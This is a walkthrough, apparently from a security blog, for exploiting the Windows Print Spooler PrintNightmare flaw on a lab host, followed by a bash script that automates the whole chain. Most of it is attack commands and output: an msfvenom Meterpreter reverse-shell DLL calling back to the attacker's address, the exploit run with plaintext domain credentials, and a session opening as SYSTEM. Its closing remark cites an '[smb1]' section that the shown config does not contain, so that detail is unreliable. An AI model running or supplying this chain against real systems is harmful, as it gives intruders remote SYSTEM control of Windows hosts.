Administrator
Published 2025-06-26

5.4 Windows Print Spooler Privilege Escalation Vulnerability (PrintNightmare)

1. Check whether the target exposes the vulnerable interface

rpcdump.py lists the RPC interfaces the target has registered with the endpoint mapper. MS-RPRN (Print System Remote Protocol) showing up means the Print Spooler service is running and reachable over RPC, which is the precondition for the attack; it does not by itself prove the host is unpatched, so treat it as a screening step and let step 4 decide.

(base) ┌──(root㉿Kali)-[~]
└─# rpcdump.py @10.10.4.8|grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol

(base) ┌──(root㉿Kali)-[~]
└─#

2. Create an anonymous SMB share

The spooler service on the target will fetch the payload DLL from this share, so it has to be readable without credentials. The section name in smb.conf becomes the share name in the UNC path used in step 4, so the two must match. Samba also only serves unknown users as guest when [global] contains map to guest = Bad User; guest ok on the share alone is not enough. Write access is not needed, since the spooler only reads the DLL.

; section name = share name; must match the \\10.10.4.10\AnonymousShare\... path used in step 4
[AnonymousShare]
comment = Samba
path = /tmp/test/
guest ok = yes
; the spooler only needs to read the DLL
read only = yes
browsable = yes

3. Generate the DLL

The DLL is written directly into /tmp/test, the directory backing the share, so it is reachable as \\10.10.4.10\AnonymousShare\1.dll. The payload is a 64-bit staged reverse_tcp Meterpreter calling back to 10.10.4.10:9001, which means a matching multi/handler must be listening before step 4 runs.

(base) ┌──(root㉿Kali)-[/tmp/test]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.4.10 LPORT=9001 -f dll > 1.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes

4. Exploitation

printnightmare.py authenticates to the target as the low-privileged domain account sec.local/hack, enumerates an existing printer driver to borrow its metadata, copies the attacker's DLL over, and then asks the spooler to load it through RpcAddPrinterDriverEx. Because the spooler performs the load in its own service context, the DLL executes with the spooler's privileges rather than the caller's.

(base) ┌──(root㉿Kali)-[~/tools/PrintNightmare]
└─# python3 printnightmare.py -dll '\\10.10.4.10\AnonymousShare\1.dll' sec.local/hack:"Az123456@"@10.10.4.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\10.10.4.10\\AnonymousShare\\1.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
Traceback (most recent call last):
  File "/root/tools/PrintNightmare/printnightmare.py", line 760, in <module>
    print_nightmare.exploit(options.name, options.env, options.path, options.dll)
  File "/root/tools/PrintNightmare/printnightmare.py", line 571, in exploit
    resp = hRpcAddPrinterDriverEx(
           ^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/tools/PrintNightmare/printnightmare.py", line 277, in hRpcAddPrinterDriverEx
    return dce.request(request)
           ^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/impacket/dcerpc/v5/rpcrt.py", line 861, in request
    answer = self.recv()
             ^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/impacket/dcerpc/v5/rpcrt.py", line 1334, in recv
    raise DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)
impacket.dcerpc.v5.rpcrt.DCERPCException: Unknown DCE RPC fault status code: c000000d
The traceback is not a failure of the attack. The DLL had already been copied and the spooler had already loaded it when RpcAddPrinterDriverEx returned the fault; 0xC000000D is the NTSTATUS code STATUS_INVALID_PARAMETER, and the tool simply does not map it to a friendly message. The handler that was started beforehand is what tells you whether the exploit worked:

msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.4.10:9001
[*] Sending stage (203846 bytes) to 10.10.4.8
[*] Meterpreter session 1 opened (10.10.4.10:9001 -> 10.10.4.8:64112) at 2025-06-27 11:55:46 +0800

meterpreter >

The session runs in the Print Spooler service's context, which on a default install is NT AUTHORITY\SYSTEM; confirm it with getuid before going further.
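The four steps above, strung together as one bash run-through with the two checks the write-up leaves implicit: that the share named in the UNC path is actually defined as guest-accessible in smb.conf, and that the handler is listening before the spooler is asked to load the DLL. This is an added example, not code from the original post or from the PrintNightmare project; it assumes the addresses, share name, share directory and account from the write-up, a checkout of printnightmare.py under ~/tools/PrintNightmare, and that smb.conf may be overwritten (override SMB_CONF to point elsewhere).

```shell
#!/usr/bin/env bash
# Added example, not from the original post or the PrintNightmare project.
# Strings the write-up's four steps together and adds the preflight checks
# the page skips. Assumed values: attacker 10.10.4.10, target 10.10.4.8,
# share directory /tmp/test, share name AnonymousShare, account sec.local/hack.

ATTACKER=${ATTACKER:-10.10.4.10}
TARGET=${TARGET:-10.10.4.8}
SHARE_NAME=${SHARE_NAME:-AnonymousShare}
SHARE_DIR=${SHARE_DIR:-/tmp/test}
LPORT=${LPORT:-9001}
SMB_CONF=${SMB_CONF:-/etc/samba/smb.conf}
PN_DIR=${PN_DIR:-$HOME/tools/PrintNightmare}       # assumed checkout of printnightmare.py
TARGET_CREDS=${TARGET_CREDS:-'sec.local/hack:Az123456@'}

# Print the share component of a UNC path (\\host\share\file -> share).
# Returns 1 if the argument is not of the form \\host\share\...
unc_share_name() {
    local p
    p=$(printf '%s' "$1" | tr '\\' '/')      # backslashes to slashes for POSIX tools
    case "$p" in
        //*/*/*) ;;
        *) return 1 ;;
    esac
    printf '%s\n' "$p" | cut -d/ -f4
}

# Return 0 if $1 (an smb.conf) has a [$2] section that sets "guest ok = yes".
share_is_anonymous() {
    awk -v want="$2" '
        /^[ \t]*\[/ { sec = $0; gsub(/^[ \t]*\[|\][ \t]*$/, "", sec); next }
        sec == want && tolower($0) ~ /^[ \t]*guest[ \t]*ok[ \t]*=[ \t]*yes/ { found = 1 }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# Write a minimal smb.conf for the staging share. "map to guest = Bad User"
# is what makes Samba treat an unknown account as guest; "guest ok" alone is
# not enough. The spooler only reads the DLL, so the share stays read-only.
write_share_config() {
    cat > "$1" <<EOF
[global]
    map to guest = Bad User

[$SHARE_NAME]
    comment = PrintNightmare staging share
    path = $SHARE_DIR
    guest ok = yes
    read only = yes
    browsable = yes
EOF
}

# Steps 1-4 from the write-up. Start the multi/handler for
# windows/x64/meterpreter/reverse_tcp on $ATTACKER:$LPORT before running this.
run_lab() {
    local dll_unc="\\\\${ATTACKER}\\${SHARE_NAME}\\1.dll"

    # 1. MS-RPRN being exposed only proves the spooler is reachable, not that
    #    the target is unpatched; the real test is whether the DLL gets loaded.
    rpcdump.py "@${TARGET}" | grep -q 'MS-RPRN' \
        || { echo "[-] MS-RPRN not exposed on ${TARGET}"; return 1; }

    # 2. Share: the name in the UNC path must match the smb.conf section.
    mkdir -p "$SHARE_DIR"
    write_share_config "$SMB_CONF"
    testparm -s "$SMB_CONF" >/dev/null || return 1
    share_is_anonymous "$SMB_CONF" "$(unc_share_name "$dll_unc")" \
        || { echo "[-] share in ${dll_unc} is not defined as guest-accessible"; return 1; }
    systemctl restart smbd

    # 3. Payload DLL, written straight into the share directory.
    msfvenom -p windows/x64/meterpreter/reverse_tcp \
        LHOST="$ATTACKER" LPORT="$LPORT" -f dll -o "${SHARE_DIR}/1.dll"

    # The handler must already be listening or the loaded DLL has nowhere to call back.
    ss -ltn | grep -q ":${LPORT} " \
        || { echo "[-] nothing listening on ${LPORT}; start multi/handler first"; return 1; }

    # 4. The RPC call can fault (the page shows c000000d) after the spooler has
    #    already loaded the DLL, so the handler, not the exit code, is the verdict.
    python3 "${PN_DIR}/printnightmare.py" -dll "$dll_unc" "${TARGET_CREDS}@${TARGET}" || true
    echo "[*] check the multi/handler for a new session"
}

if [ "${1:-}" = run ]; then run_lab; fi
```

Run it as `bash printnightmare_lab.sh run` on the Kali host after starting the handler in another terminal. The preflight functions are separated from the network steps on purpose: a mismatch like the write-up's own [smb1] section versus the \\10.10.4.10\AnonymousShare\1.dll path is caught locally, before anything touches the target.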
